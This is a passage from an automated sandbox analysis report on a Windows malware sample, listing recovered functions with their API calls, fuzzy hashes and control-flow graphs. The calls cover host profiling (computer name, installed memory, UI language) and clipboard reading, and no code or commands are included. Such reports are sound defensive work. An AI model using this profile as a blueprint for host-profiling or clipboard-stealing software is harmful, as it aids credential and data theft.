                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID: RjUh$q~
                              • API String ID: 0-821390907
                              • Opcode ID: 8855f60b83088585be91379d16a2f02e503c27079cf414d5d0c434c88f6f9efe
                              • Instruction ID: 6d830c2161e7771ecff227fedb1a789db187eda38f69635f3471a5bd615e83e5
                              • Opcode Fuzzy Hash: 8855f60b83088585be91379d16a2f02e503c27079cf414d5d0c434c88f6f9efe
                              • Instruction Fuzzy Hash: 2A1186306893408BD314DF60A9802BBB7A1DFD7324F181A2CE4D52B282D2B4890ACB4F
                              APIs
                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042DD3B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: ComputerName
                              • String ID:
                              • API String ID: 3545744682-0
                              • Opcode ID: d2b814786c89602b91310277d7c58ffcf8b7983104f32040987854ffadf0ef4d
                              • Instruction ID: 13af1f79f210c663e643d22597377e8b57ffb966ddfc1ded3bcbc60eecb644d4
                              • Opcode Fuzzy Hash: d2b814786c89602b91310277d7c58ffcf8b7983104f32040987854ffadf0ef4d
                              • Instruction Fuzzy Hash: 90219230A083D08AD725CF2598547EB7BE1AF97310F5889ADD0D9DB286CA798406CB16
                              APIs
                              • LdrInitializeThunk.NTDLL(004422FD,00000002,00000018,?,?,00000018,?,?,?), ref: 0043F07E
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: @
                              • API String ID: 2994545307-2766056989
                              • Opcode ID: 91ab349052f2a5e0af7b488e8b18c958ea97dfbfada4eef86a971c076bf112b0
                              • Instruction ID: ff9268e5f0ef520d66ccde9557708f5d44367fd1f9bf2c2a0c45829a83f3091c
                              • Opcode Fuzzy Hash: 91ab349052f2a5e0af7b488e8b18c958ea97dfbfada4eef86a971c076bf112b0
                              • Instruction Fuzzy Hash: 3D21F2724083049BE324DF58D8C166BB7F4FF8A364F10962DE968573E0D37598588B9A
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: f475004d815387e24b56f02ae5c92d5aa393327948e80634324e8b660729dd3c
                              • Instruction ID: cad3bfd8382eeba99f8fb8003847cd3c0934f2161e46365db452dc84629a0697
                              • Opcode Fuzzy Hash: f475004d815387e24b56f02ae5c92d5aa393327948e80634324e8b660729dd3c
                              • Instruction Fuzzy Hash: 7BD16C7274C7115BD7249E6C988126BF7D2EBC5324F68823ED495C73D1E638EC06839A
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 4d7b700c5193f00db228eb1ed08f42702dbe693a071f240dfb6ff437b647c801
                              • Instruction ID: 1d6b32c01808f42ce9fc1de845d8d5c063ac5960f075d98baffef674a95e2afb
                              • Opcode Fuzzy Hash: 4d7b700c5193f00db228eb1ed08f42702dbe693a071f240dfb6ff437b647c801
                              • Instruction Fuzzy Hash: 1EA14B36A083018BE714DF28D89066FB3A3EFD5350F19852EE8859B3A5DB38DC51C786

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 599 42f355-42f811 call 435570 call 408020 605 42f820-42f84e 599->605 605->605 606 42f850-42f857 605->606 607 42f859-42f85f 606->607 608 42f89d 606->608 609 42f860-42f869 607->609 610 42f89f-42f8ab 608->610 609->609 613 42f86b 609->613 611 42f8c1-42f8e7 call 440ba0 610->611 612 42f8ad-42f8af 610->612 617 42f8ec-42f91f GetPhysicallyInstalledSystemMemory 611->617 614 42f8b0-42f8bd 612->614 613->610 614->614 616 42f8bf 614->616 616->611 618 42f920-42f93a 617->618 618->618 619 42f93c-42f975 call 41d150 618->619 622 42f980-42f9a7 619->622 622->622 623 42f9a9-42f9b0 622->623 624 42f9b2-42f9b8 623->624 625 42f9cd 623->625 627 42f9c0-42f9c9 624->627 626 42f9cf-42f9d7 625->626 628 42f9eb-42f9f8 626->628 629 42f9d9-42f9da 626->629 627->627 630 42f9cb 627->630 632 42f9fa-42fa01 628->632 633 42fa1b-42fa6a 628->633 631 42f9e0-42f9e9 629->631 630->626 631->628 631->631 634 42fa10-42fa19 632->634 635 42fa70-42fa82 633->635 634->633 634->634 635->635 636 42fa84-42fa8b 635->636 637 42faab-42fab8 636->637 638 42fa8d-42fa91 636->638 640 42faba-42fac1 637->640 641 42fadb-42fb7e 637->641 639 42faa0-42faa9 638->639 639->637 639->639 642 42fad0-42fad9 640->642 642->641 642->642
                              APIs
                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F8F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: InstalledMemoryPhysicallySystem
                              • String ID: ;M
                              • API String ID: 3960555810-1963376874
                              • Opcode ID: 10caf69f60ed97e6cb6531fdb2c0f097401c7b27184ae132eb6df8dd3fc0ae58
                              • Instruction ID: fa8d7d5467d1784f6295f9e625bc611386494a62776c2f0367f5f23fe088cd52
                              • Opcode Fuzzy Hash: 10caf69f60ed97e6cb6531fdb2c0f097401c7b27184ae132eb6df8dd3fc0ae58
                              • Instruction Fuzzy Hash: 4681917050C3908AD335CF2A90513ABBBE1AF97304F94887EE4D987392D7798509CB5A

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 643 40e301-40e450 CoInitializeEx * 2
                              APIs
                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E305
                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E437
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: e03e029c43ae576055aafef706c071e93e1b73b17aa630fa558cca424c263517
                              • Instruction ID: badc22fc39d79d2ad2ef57e88bf8c93a5ca642e7d5b23c429d488a08980208a4
                              • Opcode Fuzzy Hash: e03e029c43ae576055aafef706c071e93e1b73b17aa630fa558cca424c263517
                              • Instruction Fuzzy Hash: 1341C6B4810B40AFD370EF3D994B7127EF8AB05250F504B1DF9E686AD4E631A4198BD7

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 644 40cca3-40cceb CoInitializeSecurity * 2
                              APIs
                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CCB5
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CCD2
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: InitializeSecurity
                              • String ID:
                              • API String ID: 640775948-0
                              • Opcode ID: 7be7b3d4cc9485e78b3e8bbd968173f92e8cc9c60a7562698af58a8b14ca9521
                              • Instruction ID: b9662e56c7467ad356e1225328403caabe5bf832202d6c075b2334e727113f03
                              • Opcode Fuzzy Hash: 7be7b3d4cc9485e78b3e8bbd968173f92e8cc9c60a7562698af58a8b14ca9521
                              • Instruction Fuzzy Hash: 9BE042383D97557BFA785B55AC57F143225A786F22F344314B7263E2E98AE03101451D

                              Control-flow Graph

                              APIs
                              • GetForegroundWindow.USER32 ref: 0043FC02
                              • GetForegroundWindow.USER32 ref: 0043FC15
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: ForegroundWindow
                              • String ID:
                              • API String ID: 2020703349-0
                              • Opcode ID: 2a44a2c17b8f4ba846ff4ca7b5fe7fcc2c77f2264e2589c43696590b4c6862f2
                              • Instruction ID: bde8246ef72a070659e7a76b00f315846862c71f1eb23ebd796a4c91db4933b2
                              • Opcode Fuzzy Hash: 2a44a2c17b8f4ba846ff4ca7b5fe7fcc2c77f2264e2589c43696590b4c6862f2
                              • Instruction Fuzzy Hash: E8E09277A401498BCB0C5BB5BC2729F361ABBC520C71F423ED58B17661D938A9468B86
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: d74f5a0d5c7a0308015b0765f9746502a4f33eb47b1966efc83fefb1affdcfbe
                              • Instruction ID: a07fce3562be8b4f71968b838422cee5be512d5bca0768071ffce9e40fd8e134
                              • Opcode Fuzzy Hash: d74f5a0d5c7a0308015b0765f9746502a4f33eb47b1966efc83fefb1affdcfbe
                              • Instruction Fuzzy Hash: 45A1F0B5A08200CBDB14DF68C5843AEB7F1EBC8314F15492EE85997391D77998C6CB8B
                              APIs
                              • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042DBF8
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: ComputerName
                              • String ID:
                              • API String ID: 3545744682-0
                              • Opcode ID: 4fe5518e69fb32c52fcb733550686c9f0ba623baa35c2427973c17709272a6ce
                              • Instruction ID: abdbcfc85cc3d590b4d9f80ed1b5259008fca6daeb1074775b7837edf01d50b0
                              • Opcode Fuzzy Hash: 4fe5518e69fb32c52fcb733550686c9f0ba623baa35c2427973c17709272a6ce
                              • Instruction Fuzzy Hash: 572128329183904FD3208F29C8117DFBBE5ABD6314F1A89BE84D9D72A1DE7849058B95
                              APIs
                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042DD3B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: ComputerName
                              • String ID:
                              • API String ID: 3545744682-0
                              • Opcode ID: 6b0bf8f889fdf756744bf6703b1681f13e50392cec377c98574ffa542c3868df
                              • Instruction ID: 7245d9de3664dd1b53aa825ccf4eb06682f2d51eba3296a619965df6286c0bfe
                              • Opcode Fuzzy Hash: 6b0bf8f889fdf756744bf6703b1681f13e50392cec377c98574ffa542c3868df
                              • Instruction Fuzzy Hash: 0C11CE30A1C3D08BD725CF24C8557EB7BE1ABC7310F18886DD0C9DB286CA798402CB16
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: 731f161a238695e4e7fb5ada1d8a03da6e716328faea4b6fe8143de3fd4db56a
                              • Instruction ID: 6fc9bee3fe965ab2d8a02718e9f0262d015b0fcadce505c2a3e01ed55a15df59
                              • Opcode Fuzzy Hash: 731f161a238695e4e7fb5ada1d8a03da6e716328faea4b6fe8143de3fd4db56a
                              • Instruction Fuzzy Hash: 74216DB5D082409BD700EF68D5863AE7BE0AB95304F04482EE88597241EB3DA599CB9B
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: 54f743209ffb328fb1bcadef23338e35e1fac801d1d9dfecaf20c668b9c2ccd3
                              • Instruction ID: faf65d23e167afe2608bca985cfd671198cf28287e4a965336946f91a72ba7ed
                              • Opcode Fuzzy Hash: 54f743209ffb328fb1bcadef23338e35e1fac801d1d9dfecaf20c668b9c2ccd3
                              • Instruction Fuzzy Hash: 531160F9D082048BD700FF64E5863AE7BE0AB95304F00883FE88557241D77D9599CB9B
                              APIs
                              • GetUserDefaultUILanguage.KERNELBASE ref: 004389AF
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: DefaultLanguageUser
                              • String ID:
                              • API String ID: 95929093-0
                              • Opcode ID: 956965194e4c3879880e8385a27044bc88a81f50f0bdc4fa7ebe5357a51793da
                              • Instruction ID: dee85013a50a0ba3bede4ba5c1dbffa65f4075042fd01df7824f7729c30bfe49
                              • Opcode Fuzzy Hash: 956965194e4c3879880e8385a27044bc88a81f50f0bdc4fa7ebe5357a51793da
                              • Instruction Fuzzy Hash: D0115970A19280CFDB18CF38CD94B69BFB2AFCA305F1881DCD48987396CA359806CB11
                              APIs
                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?,00000000,?,0040B65E,?,?), ref: 0043F012
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: ba2b12a4c8b63bfddb0ea029f33ffa71bde5286063443eba3e10ccdda4c090f1
                              • Instruction ID: 1e20f94c7d93bff00bb7af5e81629b14c497d637b4691000bbc6c064ce59cb60
                              • Opcode Fuzzy Hash: ba2b12a4c8b63bfddb0ea029f33ffa71bde5286063443eba3e10ccdda4c090f1
                              • Instruction Fuzzy Hash: 7BF0EC76914211EBD6145F2CBC01D673778DF8B714F111836F505D7112D739EC11D99A
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: BlanketProxy
                              • String ID:
                              • API String ID: 3890896728-0
                              • Opcode ID: 7693d5087307d70c2225b2f5b7a5a5e8813f453b54809cdd879d8216520e0831
                              • Instruction ID: 8bd587e198a483ca91745067cf552d33ee8b799b06de1d844888fcaa4f8121cc
                              • Opcode Fuzzy Hash: 7693d5087307d70c2225b2f5b7a5a5e8813f453b54809cdd879d8216520e0831
                              • Instruction Fuzzy Hash: F7F0E7746087018FE301DF25C5E571BBBE0BB8A304F10C91CD1A44B354C7B5A6498F82
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: BlanketProxy
                              • String ID:
                              • API String ID: 3890896728-0
                              • Opcode ID: 08f22d7be0c78e64335db71f63ae92ae9634d60515c2c8830fdf75eb2b6a953b
                              • Instruction ID: 09e4eb2bbc1e8e356619c4d93f3b34aec8616dc214137210f461328fe75fbdb5
                              • Opcode Fuzzy Hash: 08f22d7be0c78e64335db71f63ae92ae9634d60515c2c8830fdf75eb2b6a953b
                              • Instruction Fuzzy Hash: 25F0F4746087018FE300DF24C49934BBBE1AB84308F15891CE4945B294CBB5A5498F82
                              APIs
                              • RtlFreeHeap.NTDLL(?,00000000,FFFFFFFF,0043D677,00000000,?,00000000,?,?,00427ADB,DB4ED94B), ref: 0043D4A0
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: e8e21ba935653368a9726be937bc089359b5990c85b4714d283e3eb82f8088a1
                              • Instruction ID: bd8716210ec8d959d22720ba78e382fd4d79b7ad4465810db998c3e75f578eb6
                              • Opcode Fuzzy Hash: e8e21ba935653368a9726be937bc089359b5990c85b4714d283e3eb82f8088a1
                              • Instruction Fuzzy Hash: 0BD0C936419622EBC6102F18BC06BCB3A94DF4A321F0748A6B540AA175C678EC919AD8
                              APIs
                              • RtlAllocateHeap.NTDLL(?,00000000,989BBA9D,E43AA887,0040886E,989BBA9D), ref: 0043D470
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: d4caeb4f47506de59fb4607f93ff2b774fe5ad36e251d27d0d6278e9ce35c44f
                              • Instruction ID: d2e29cc27a65fe1ca6c2eb106a79703fbeb51fc8642af10384060e15434c0d6e
                              • Opcode Fuzzy Hash: d4caeb4f47506de59fb4607f93ff2b774fe5ad36e251d27d0d6278e9ce35c44f
                              • Instruction Fuzzy Hash: 7AC09231045220AFDA146B15FD09FCA3F68EF4A361F0204A6B144A70B2C7B0BC92DED9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                              • String ID: 5${
                              • API String ID: 2832541153-3957241723
                              • Opcode ID: 4be3ae1e7b685d8aa39f07097afd4b1f8086d6ba818c78ade9bcec8ec36e32c7
                              • Instruction ID: 77f75d3f843e1ddc5715d0d0e0f4209c47f0aacc074521cc1377cbd859072ea3
                              • Opcode Fuzzy Hash: 4be3ae1e7b685d8aa39f07097afd4b1f8086d6ba818c78ade9bcec8ec36e32c7
                              • Instruction Fuzzy Hash: 6241BE7010C7818FC301AF78998931EBFE0AB96324F094A3EE4D5862D2D6788589C7A7
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID: "}e$*'!*$-}e$0$h$ou
                              • API String ID: 3664257935-1343566695
                              • Opcode ID: 20a4a6c314db585875ca8717a96222d0e4d5fb709ecd1fb99d38c7804a204f9d
                              • Instruction ID: 9a2cc8735b334f5eb7dd33608fe55bf2896880d18ec1a6c6a9828f2004405501
                              • Opcode Fuzzy Hash: 20a4a6c314db585875ca8717a96222d0e4d5fb709ecd1fb99d38c7804a204f9d
                              • Instruction Fuzzy Hash: C7813B2420D3D18BD724CB2A995072BFFE1AFD6304F18899EE4D59B392C6398846C75B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID: "[ux$"[ux$'[ux$'[ux$>$D$^
                              • API String ID: 0-301496773
                              • Opcode ID: c4c09141dcdc9d42205aa105af6dba0d0d7c7be176408c342585578faee69009
                              • Instruction ID: ad97de9c1cfb1f1073a1bcdbefd1ec41e1c21d92c4fe56fe58a12e60a508c2ff
                              • Opcode Fuzzy Hash: c4c09141dcdc9d42205aa105af6dba0d0d7c7be176408c342585578faee69009
                              • Instruction Fuzzy Hash: 6152F5745083409FD724CF24D8607BB77E1FF8A314F154A6DE0DA8B2A2EB389945CB5A
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID: Y=n?$Y=n?$\
                              • API String ID: 0-1148525055
                              • Opcode ID: 3b6940478bfb522716c6abf886b5fa7f5b638e6a56157606f5a2d7110563bcb5
                              • Instruction ID: d631f8773df64762f5f13e102b32d6de0376f76cb16f6785bdec6563801ec1c3
                              • Opcode Fuzzy Hash: 3b6940478bfb522716c6abf886b5fa7f5b638e6a56157606f5a2d7110563bcb5
                              • Instruction Fuzzy Hash: DDE122766083518FC310CF24C8912ABBBE2FFD9314F0A8A6DE4C95B351D7399946CB96
                              APIs
                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417444
                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004174E3
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: EnvironmentExpandStrings
                              • String ID: 3wA$7$&.
                              • API String ID: 237503144-4200240528
                              • Opcode ID: d7567aafd26a5b6ec08765d21677a9bc00fcbcdea9aaf1cd81594bde76293840
                              • Instruction ID: 8a99b0927b43636473126fa4c79d97a44fc09134ac2767abdde0108cd9a69b93
                              • Opcode Fuzzy Hash: d7567aafd26a5b6ec08765d21677a9bc00fcbcdea9aaf1cd81594bde76293840
                              • Instruction Fuzzy Hash: DA0205755083518BC324CF29C8906ABB7F2FFD9314F098A6DE8C99B391EB388941C756
                              APIs
                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00424AE1
                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00424B69
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: EnvironmentExpandStrings
                              • String ID: Ikd%$Ikd%
                              • API String ID: 237503144-3983221050
                              • Opcode ID: 5088d75347c20790919e442be4affb35d75d0c45d6a29c6c6a5ac613d2cc120a
                              • Instruction ID: 2e0c19c9d1a62baff96f1739691ebab1e8852c0fae1d023f0a69f627e73021e4
                              • Opcode Fuzzy Hash: 5088d75347c20790919e442be4affb35d75d0c45d6a29c6c6a5ac613d2cc120a
                              • Instruction Fuzzy Hash: 306102B954C3618FD320CF55D88075BBBA1FFD2705F04892DE9A95B381D7B1980ACB86
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID: EYAB$MQIJ$nA$rpvU$tsF}
                              • API String ID: 0-1507197092
                              • Opcode ID: c15e6fe2dc55625c134df2f1227e070678312451725a6ca3e262cf6e30b079d9
                              • Instruction ID: 4f6c2c83dd9d565ef0239110dcdacd47585432fef0474d853b36f2f82b818a61
                              • Opcode Fuzzy Hash: c15e6fe2dc55625c134df2f1227e070678312451725a6ca3e262cf6e30b079d9
                              • Instruction Fuzzy Hash: CFE146B290C3518FD324DF68D88176BB7E2AB86304F45897EE4D587292D278DD05CB8A
                              Strings
                              Memory Dump Source
